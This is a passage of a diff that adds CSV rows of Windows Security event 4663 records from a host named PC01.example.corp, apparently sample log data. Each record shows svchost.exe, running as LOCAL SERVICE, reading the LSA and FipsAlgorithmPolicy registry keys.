+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452862</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452861</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452860</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452859</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452858</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452857</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452856</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452855</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452854</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452853</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452852</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452851</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452850</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.315405Z"">
+    </TimeCreated>
+    <EventRecordID>452849</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452848</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452847</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
